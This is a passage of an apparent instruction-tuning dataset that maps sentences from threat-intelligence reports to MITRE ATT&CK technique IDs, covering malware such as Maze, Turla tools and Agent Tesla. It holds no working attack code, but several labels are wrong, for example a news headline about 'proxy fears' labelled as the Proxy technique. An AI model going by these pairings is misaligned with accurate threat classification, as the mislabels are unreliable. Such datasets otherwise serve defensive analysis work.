creates a backdoor through which remote attackers can open a command-line interface.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Watches uninstall time, checks time diff (local time vs internet time)### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 has deleted existing logs and exfiltrated file archives from a victim.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Launch Agents can also be executed using the Launchctl command.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Microsoft Windows Application Compatibility Infrastructure/Framework was created to allow for backward compatibility of software as the operating system codebase changes over time.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,[Screenshot 1] Encrypted Login Packet sent by Gh0stRAT infected PC In addition to a standard malware analysis blog post, I’d also like to take this time to document and describe my methods for analysis, in the hopes that you as a reader will use these techniques in the future### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has utilized tools to aggregate data prior to exfiltration.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Molerats has sent malicious links via email trick users into opening a RAR archive and running an executable.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Anchor can determine the public IP and location of a compromised host.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.### Assistant: T1580: Cloud Infrastructure Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Goopy has checked for the Google Updater process to ensure Goopy was loaded properly.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windshift has used malware to identify the username on a compromised host.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WastedLocker has used cmd to execute commands on the system.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also compromise web servers to support watering hole operations, as in Drive-by Compromise.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Downdelph inserts pseudo-random characters between each original character during encoding of C2 network requests, making it difficult to write signatures on them.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has sent malicious Office documents via email as part of spearphishing campaigns as well as executables disguised as documents.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework., PowerShell ### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malicious .lnk files contain a link to a URL (instead of the expected local URI) to grab the next payload### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete used multiple compiled Python scripts on the victim’s system.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NetTraveler contains a keylogger.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke has used uname -m to collect the name and information about the infected system's kernel.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment.### Assistant: T1525: Implant Internal Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldMax has impersonated systems management software to avoid detection.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER compromised three Japanese websites using a Flash exploit to perform watering hole attacks.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 obtained PKI keys, certificate files and the private encryption key from an Active Directory Federation Services container to decrypt corresponding SAML signing certificates.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EVILNUM can obtain the computer name from the victim's system.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Application and network credentials are stored in the Windows Credentials locker.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sykipot may use net start to display running services.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse AppleScript for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BISCUIT has a command to collect the processor type, operation system, computer name, uptime, and whether the system is a laptop or PC.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ixeshe can list running services.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RDAT can also embed additional messages within BMP images to communicate with the RDAT operator.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kasidet has the ability to initiate keylogging.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The script will send the specified number of DNS queries using the following format, each of which the C2 will respond with an IPv6 address that the script will treat as a string of data:   www...   The payload will treat the data provided by the C2 as a message, which will have the following structure:   hello   The message will start with the string hello followed by a 35-character UUID string### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gallmaker sent emails with malicious Microsoft Office documents attached.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group has obtained SSL certificates for their C2 domains.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has collected data from remote systems by mounting network shares with net use and using Robocopy to transfer data.### Assistant: T1039: Data from Network Shared Drive" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Octopus can capture screenshots of the victims’ machine.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This technique is similar to ROMMONkit and may result in the network device running a modified image.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SYSCON has the ability to execute commands through cmd on a compromised host.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,vaultcmd.exe is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sakula uses single-byte XOR obfuscation to obfuscate many of its files.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malware Delivery Method In all emails sent to these government officials, the actor used the same attachment: a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Example network shares include `C$`, `ADMIN$`, and `IPC$`.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla surveys a system upon check-in to discover information in the Windows Registry with the reg query command.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, TA505 makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zeus Panda queries the system's keyboard mapping to determine the language used on the system.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,[9] “HKU concern group raises proxy fears in key vote.” EIJ Insight### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Deep Panda uses the Microsoft Tasklist utility to list processes running on systems.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CookieMiner has used python scripts on the user’s system, as well as the Python variant of the Empire agent, EmPyre.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This is very similar to Process Hollowing but targets an existing process rather than creating a process in a suspended state.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Credential Harvesting Attack On June 24, 2018, Unit 42 observed DarkHydrus carrying out a credential harvesting attack on an educational institution in the Middle East### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sowbug listed remote shared drives that were accessible from a victim.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.### Assistant: T1565: Data Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some APT40 malware tools can evade typical network detectiona by leveraging legitimate websites, such as GitHub, Google, and Pastebin for initial C2 communications### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NativeZone has, upon execution, displayed a message box that appears to be related to a Ukrainian electronic document management system.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SQLRat has scripts that are responsible for deobfuscating additional scripts.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cardinal RAT can log keystrokes.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Evilnum has used PowerShell to bypass UAC.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WINERACK can enumerate services.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Calisto presents an input prompt asking for the user's login and password.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silent Librarian has used links in e-mails to direct victims to credential harvesting websites designed to appear like the targeted organization's login page.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On the next step this file is executed by rundll32.exe via the KlpSvc export### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RATANKBA runs the net view /domain and net view commands.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZeroT has used RC4 to encrypt C2 traffic.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 used the service control manager on a remote system to disable services associated with security monitoring products.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CostaBricks has been used to load SombRAT onto a compromised host.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT19 collected system architecture information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If an attacker has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a Web Shell.### Assistant: T1525: Implant Internal Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Frankenstein has used Word documents that prompts the victim to enable macros and run a Visual Basic script.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,* RID 501 is the guest account.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Anchor can download additional payloads.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Spark has encoded communications with the C2 server with base64.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In Mac and Linux, this is accomplished with the ps command.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Maze has issued a shutdown command on a victim machine that, upon reboot, will run the ransomware within a VM.### Assistant: T1529: System Shutdown/Reboot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cryptoistic has the ability to send and receive files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SMOKEDHAM has communicated with its C2 servers via HTTPS and HTTP POST requests.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pteranodon exfiltrates screenshot files to its C2 server.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After Comnie collects the remote C2 information, it will communicate with these remote servers using HTTP requests### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Briba installs a service pointing to a malicious DLL dropped to disk.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Axiom has been known to dump credentials.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Shamoon obtains the victim's operating system version and keyboard layout and sends the information to the C2 server.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WannaCry attempts to kill processes associated with Exchange, Microsoft SQL Server, and MySQL to make it possible to encrypt their data stores.### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KONNI can take screenshots of the victim’s machine.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silence has weaponized CHM files in their phishing campaigns.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SeaDuke uses an event filter in WMI code to execute a previously dropped executable shortly after system startup.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Any standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may supply CMSTP.exe with INF files infected with malicious commands.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Linux desktop environments that are XDG compliant implement functionality for XDG autostart entries.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ABK can extract a malicious Portable Executable from a photo.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TAINTEDSCRIBE can delete files from a compromised host.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Initial Attack On December 13, 2017, a spear phishing email was sent from the email address of yuri.sidorav@yandex[.]ru to a high ranking individual within a British government agency### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BabyShark has encoded data using certutil before exfiltration.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NOKKI uses a unique, custom de-obfuscation technique.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To enable or disable a specified setting or audit category, adversaries may use the /success or /failure parameters.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XTunnel relays traffic between a C2 server and a victim.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Shamoon copies an executable payload to the target system by using SMB/Windows Admin Shares and then scheduling an unnamed task to execute the malware.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The information may be used to enhance their awareness of the system and network environment or may be used for further actions.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may attempt to enumerate the cloud services running on a system after gaining access.### Assistant: T1526: Cloud Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The SP variable is a string containing the victim's username### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser and be used as an installer for a RAT for persistence.### Assistant: T1176: Browser Extensions" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bisonal variants reported on in 2014 and 2015 used a simple XOR cipher for C2.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Every New Technology File System formatted partition contains a Master File Table that maintains a record for every file/directory on the partition.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,/grant Everyone:F /T /C /Q to make some of its files hidden and grant all users full access controls.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hi-Zor deletes its RAT installer file as it executes its DLL payload file.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pupy can communicate using multiple transports, migrate into processes using reflective injection, and load remote python code, python packages and python C-extensions from memory### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gorgon Group malware can deactivate security mechanisms in Microsoft Office by editing several keys and values under HKCU\Software\Microsoft\Office\.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShimRat has installed a registry based start-up key HKCU\Software\microsoft\windows\CurrentVersion\Run to maintain persistence should other methods fail.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Darkhotel has used malware that searched for files with specific patterns.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT-C-36 has disguised its scheduled tasks as those used by Google.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Drovorub can execute arbitrary commands as root on a compromised system.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Processes running with root privileges can use this facility to scrape live memory of other running programs.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,So this method uses psexec itself to copy the payload over the network, overwrite earlier versions (if found), and run it without waiting for any response. They use batch files that leverage psexec , again, to push PowerShell loader scripts out to machines the network scanner finds on the internal network.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RGDoor executes the whoami on the victim’s machine.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LiteDuke can create persistence by adding a shortcut in the CurrentVersion\Run Registry key.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Truvasys adds a Registry Run key to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has used encoded PowerShell commands.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Javali has used embedded VBScript to download malicious payloads from C2.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This is attack vector presents interesting problems, as blocking or restricting the use of WMIC may not be a feasible solution for some administrators### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak can execute tasks via OLE.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework., capture keystrokes### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WellMail can use TCP for C2 communications.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DustySky contains a keylogger.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silent Librarian has used compromised credentials to obtain unauthorized access to online accounts.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remote access tools may be established and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system.### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has used WMI event filters and consumers to establish persistence.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork used Visual Basic Scripts on victim machines.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla has used process hollowing to create and manipulate processes through sections of unmapped memory by reallocating that space with its malicious code.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT18 actors leverage legitimate credentials to log into external remote services.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Credentials targeted by PinchDuke include ones associated many sources such as WinInet Credential Cache, and Lightweight Directory Access Protocol .### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo collects a list of installed antivirus software from the victim’s system.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework., LoadLibraryExW()### Assistant: T1129: Shared Modules" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gold Dragon can download additional components from the C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Also, the x command will delete the generated registry key and the Office365DCOMCheck/SystemDiskClean scheduled task### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has also retrieved PowerShell payloads hidden in Registry keys as well as checking keys associated with null session named pipes .### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JPIN contains a custom keylogger.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information from these sources may reveal opportunities for other forms of reconnaissance or Search Open Websites/Domains, establishing operational resources or Obtain Capabilities, and/or initial access or Valid Accounts.### Assistant: T1597: Search Closed Sources" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has used legitimate access granted to Managed Service Providers in order to access victims of interest.### Assistant: T1199: Trusted Relationship" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has extracted password hashes from ntds.dit to crack offline.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Comnie achieves persistence by adding a shortcut of itself to the startup path in the Registry.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Maze has decrypted strings and other important information during the encryption process.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The decrypted code resolves the necessary API functions, decompresses the embedded PE file with RtlCompressBuffer() using LZNT1 and maps it into memory### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SDBbot has the ability to download a DLL from C2 to a compromised host.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may execute their own malicious payloads by side-loading DLLs.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hildegard has queried the Cloud Instance Metadata API for cloud credentials.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DEL-TEMP Deletes all files in the “AppData/Local/Temp” path### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Filename SHA256 Description 7za.exe dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229 7-Zip 17.01 beta nbt.exe c9d5dc956841e000bfd8762e2f0b48b66c79b79500e894b4efa7fb9ba17e4e9e nbtscan 1.0.35 rx.exe a6a0fbfee08367046d3d26fb4b4cf7779f7fb6eaf7e60e1d9b6bf31c5be5b63e IntelliAdmin Remote Execute v1.0 Table 5### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For operations incorporating social engineering, the utilization of a persona on social media may be important.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM has used Taiwan-based servers that appear to be exclusive to GALLIUM.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy executes the reg query command to obtain information in the Registry.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BBSRAT can query service configuration information.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services server, they may instead generate their own trusted token-signing certificate.### Assistant: T1606: Forge Web Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One variant of CloudDuke uses HTTP and HTTPS for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may be performed during automated discovery and can be accomplished in numerous ways such as using Ping, tracert, and GET requests to websites.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif has used Registry Run keys to establish automatic execution at system startup.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Goopy has the ability to maintain persistence by creating scheduled tasks set to run every hour.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldenSpy constantly attempts to download and execute files from the remote C2, including GoldenSpy itself if not found on the system.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLUELIGHT can harvest cookies from Internet Explorer, Edge, Chrome, and Naver Whale browsers.### Assistant: T1539: Steal Web Session Cookie" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GRIFFON has used a reconnaissance module that can be used to retrieve information about a victim's computer, including the resolution of the workstation .### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Maintain Presence APT40 primarily uses backdoors, including web shells, to maintain presence within a victim environment### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions.### Assistant: T1104: Multi-Stage Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil can use WMI to monitor for and kill specific processes listed in its configuration file.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search the bash command history on compromised systems for insecurely stored credentials.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, in the previous variant of BADNEWS, the victim’s unique identifier was stored under a variable named ‘uid’, the username was stored in a variable named ‘u’, etc### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has run whoami on a victim.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HyperBro has used a legitimate application to sideload a DLL to decrypt, decompress, and run a payload.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LookBack has a function that decrypts malicious data.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The screenshot also shows the Glimpse server receiving the results of the whoami command executed by the agent### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GravityRAT has a feature to list the available services on the system.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT1 has sent spearphishing emails containing malicious attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 used 7-Zip to decode its Raindrop malware.### Assistant: T1140: Deobfuscate/Decode Files 